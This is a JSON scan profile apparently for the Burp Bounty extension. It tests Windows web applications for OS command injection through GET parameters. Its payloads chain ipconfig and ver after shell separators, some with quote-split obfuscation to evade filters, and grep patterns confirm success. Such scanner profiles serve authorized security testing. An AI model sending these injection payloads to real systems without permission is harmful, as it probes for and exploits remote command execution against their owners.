[
  {
    "ProfileName": "RCE_Windows_GETParams",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "true, |ipconfig ",
      "true, ||ipconfig ",
      "true, ;ipconfig ",
      "true, \u0026ipconfig ",
      "true, \u0026\u0026ipconfig ",
      "true, |i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      "true, ||i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      "true, ;i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      "true, \u0026i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      "true, \u0026\u0026i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      "true, |i\"p\"c\"o\"n\"f\"i\"g\"",
      "true, ||i\"p\"c\"o\"n\"f\"i\"g\"",
      "true, ;i\"p\"c\"o\"n\"f\"i\"g\"",
      "true, \u0026i\"p\"c\"o\"n\"f\"i\"g\"",
      "true, \u0026\u0026i\"p\"c\"o\"n\"f\"i\"g\"",
      "true,  |ver ",
      "true, ||ver ",
      "true, ;ver ",
      "true, \u0026ver ",
      "true, \u0026\u0026ver"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,Windows\\sIP\\sConfiguration",
      "true,Or,Ethernet\\s[0-9]?:",
      "true,Or,Microsoft\\sWindows\\s\\[Versi"
    ],
    "Tags": [
      "All",
      "RCE",
      "All GET Parameters",
      "RCE GET Parameters"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": true,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 2,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "RCE_Windows_GETParams",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "https://portswigger.net/web-security/os-command-injection\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      0
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]